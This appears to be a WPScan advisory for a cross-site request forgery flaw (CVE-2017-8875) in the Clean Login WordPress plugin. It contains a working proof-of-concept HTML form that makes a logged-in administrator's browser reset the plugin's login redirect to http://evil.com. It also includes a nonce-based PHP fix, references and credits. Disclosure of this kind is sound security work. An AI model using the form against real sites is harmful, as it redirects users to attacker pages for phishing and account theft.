Clean Login <= 1.7.12 - Change Redirect URL CSRF


Proof of Concept
<form method="POST" action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=wpcsw_settings">
  <input type="text" name="adminbar" value="on">
  <input type="text" name="emailnotificationcontent" value="">
  <input type="text" name="termsconditionsMSG" value="">
  <input type="text" name="termsconditionsURL" value="">
  <input type="text" name="urlredirect" value="http://127.0.0.1/wordpress">
  <input type="text" name="loginredirect" value="on">
  <input type="text" name="loginredirect_url" value="http://evil.com">
  <input type="text" name="logoutredirect_url" value="http://127.0.0.1/wordpress">
  <input type="text" name="cl_hidden_field" value="hidden_field_to_update_others">
  <input type="text" name="Submit" value="Save Changes">
  <input type="submit">
</form>
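The form above works because the settings handler accepts any POST carrying the expected field names, with nothing tying the request to the logged-in administrator's session. The following is an added example, not the Clean Login plugin's own code, of how a WordPress settings page for the same option is normally hardened: a nonce is embedded in the form and verified on submission, the caller's capability is checked, and the redirect target is validated so it cannot point off-site. The function names (wpcsw_settings_page, wpcsw_save_settings), the nonce action and field name, and the option key wpcsw_loginredirect_url are assumptions chosen for illustration; the WordPress API calls themselves are real.

```php
<?php
// Added example (not the plugin's code): a CSRF-hardened settings handler.
// wpcsw_settings_page, wpcsw_save_settings, the nonce action/field names and
// the option key are hypothetical; the WordPress functions used are standard.

// Render the settings form. wp_nonce_field() emits a hidden field holding a
// nonce bound to the current user and session, which a cross-site form cannot
// know in advance.
function wpcsw_settings_page() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin.php?page=wpcsw_settings' ) ); ?>">
        <?php wp_nonce_field( 'wpcsw_save_settings', 'wpcsw_settings_nonce' ); ?>
        <label>Login redirect URL
            <input type="text" name="loginredirect_url"
                   value="<?php echo esc_attr( get_option( 'wpcsw_loginredirect_url', '' ) ); ?>">
        </label>
        <?php submit_button( 'Save Changes', 'primary', 'Submit' ); ?>
    </form>
    <?php
}

// Process the submission. Requests without a valid nonce, or from users who
// may not manage options, are rejected before any option is written.
function wpcsw_save_settings() {
    if ( ! isset( $_POST['Submit'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges.' );
    }
    // check_admin_referer() terminates the request with a 403 page when the
    // nonce field is missing, expired or was issued for another user.
    check_admin_referer( 'wpcsw_save_settings', 'wpcsw_settings_nonce' );

    $url = isset( $_POST['loginredirect_url'] )
        ? esc_url_raw( wp_unslash( $_POST['loginredirect_url'] ) )
        : '';
    // wp_validate_redirect() returns the fallback (home_url) unless the host
    // matches this site or one added via the allowed_redirect_hosts filter,
    // so a stored redirect can never send users to a third-party domain.
    $url = wp_validate_redirect( $url, home_url( '/' ) );
    update_option( 'wpcsw_loginredirect_url', $url );
}
add_action( 'admin_init', 'wpcsw_save_settings' );
```

The nonce check alone defeats the forged form shown above; the capability check covers the case where a lower-privileged user reaches the handler, and wp_validate_redirect() limits the damage if a redirect value is ever written by some other path.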

Affects Plugin

Clean Login (fixed in version 1.8)

References

CVE 2017-8875
URL http://seclists.org/fulldisclosure/2017/May/23

Classification

Type CSRF
OWASP Top 10 A8: Cross-Site Request Forgery (CSRF)
CWE CWE-352

Miscellaneous

Submitter ethicalhack3r
Submitter Website https://dewhurstsecurity.com/
Submitter Twitter ethicalhack3r
Views 141
Verified No
WPVDB ID 8808

Timeline

Publicly Published 2017-05-05
Added 2017-05-11
Last Updated 2017-05-11

Copyright & License

Copyright All data and resources contained within this page and this web site are Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.